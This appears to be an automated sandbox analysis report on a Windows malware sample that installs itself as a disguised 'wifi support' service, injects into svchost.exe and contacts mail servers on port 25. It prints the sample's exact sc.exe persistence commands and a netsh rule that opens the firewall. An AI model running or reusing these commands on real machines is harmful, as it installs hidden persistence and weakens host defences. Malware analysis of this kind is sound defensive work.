        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support"Jump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" description ycgeofkw "wifi internet conection"Jump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ycgeofkwJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nulJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: 874A7cigvX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\874A7cigvX.exeUnpacked PE file: 0.2.874A7cigvX.exe.400000.0.unpack .text:ER;.data:W;.yey:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeUnpacked PE file: 12.2.xvkslbws.exe.400000.0.unpack .text:ER;.data:W;.yey:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Users\user\Desktop\874A7cigvX.exeUnpacked PE file: 0.2.874A7cigvX.exe.400000.0.unpack
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeUnpacked PE file: 12.2.xvkslbws.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr,0_2_00406069
        Source: 874A7cigvX.exeStatic PE information: section name: .yey
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_0267C34E push 0000002Bh; iretd 0_2_0267C354
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeCode function: 12_2_02635776 push 0000002Bh; iretd 12_2_0263577C
        Source: 874A7cigvX.exeStatic PE information: section name: .text entropy: 7.609251717911276

        Persistence and Installation Behavior

        barindex
        Source: unknownExecutable created and started: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe
        Source: C:\Users\user\Desktop\874A7cigvX.exeFile created: C:\Users\user\AppData\Local\Temp\xvkslbws.exeJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe (copy)Jump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe (copy)Jump to dropped file
        Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ycgeofkwJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support"

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\SysWOW64\svchost.exeFile deleted: c:\users\user\desktop\874a7cigvx.exeJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00401000
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeCode function: inet_addr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetBestInterface,GetProcessHeap,HeapAlloc,GetAdaptersInfo,HeapReAlloc,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary,15_2_030F199C
        Source: C:\Windows\SysWOW64\svchost.exe TID: 3332Thread sleep count: 40 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe TID: 3332Thread sleep time: -40000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,0_2_00401D96
        Source: svchost.exe, 0000000F.00000002.3299943698.0000000003400000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr,0_2_00406069
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_0261092B mov eax, dword ptr fs:[00000030h]0_2_0261092B
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_02610D90 mov eax, dword ptr fs:[00000030h]0_2_02610D90
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_02678943 push dword ptr fs:[00000030h]0_2_02678943
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeCode function: 12_2_02631D6B push dword ptr fs:[00000030h]12_2_02631D6B
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeCode function: 12_2_02D7092B mov eax, dword ptr fs:[00000030h]12_2_02D7092B
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeCode function: 12_2_02D70D90 mov eax, dword ptr fs:[00000030h]12_2_02D70D90
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_0040EBCC GetProcessHeap,RtlAllocateHeap,0_2_0040EBCC
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeCode function: 12_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,12_2_00409A6B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_030F9A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,15_2_030F9A6B

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.232.41.29 443Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.101.42.0 25Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 64.233.166.26 25Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.195.204.74 25Jump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 30F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30F0000Jump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F18008Jump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ycgeofkw\Jump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xvkslbws.exe" C:\Windows\SysWOW64\ycgeofkw\Jump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support"Jump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" description ycgeofkw "wifi internet conection"Jump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ycgeofkwJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nulJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,0_2_00407809
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00406EDD
        Source: C:\Users\user\Desktop\874A7cigvX.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,0_2_0040405E
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_0040EC54 GetSystemTimeAsFileTime,GetVolumeInformationA,GetTickCount,0_2_0040EC54
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,0_2_00407809
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_0040B211 FileTimeToSystemTime,GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,SystemTimeToFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,0_2_0040B211
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00409326 GetVersionExA,GetModuleHandleA,GetModuleFileNameA,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,0_2_00409326

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
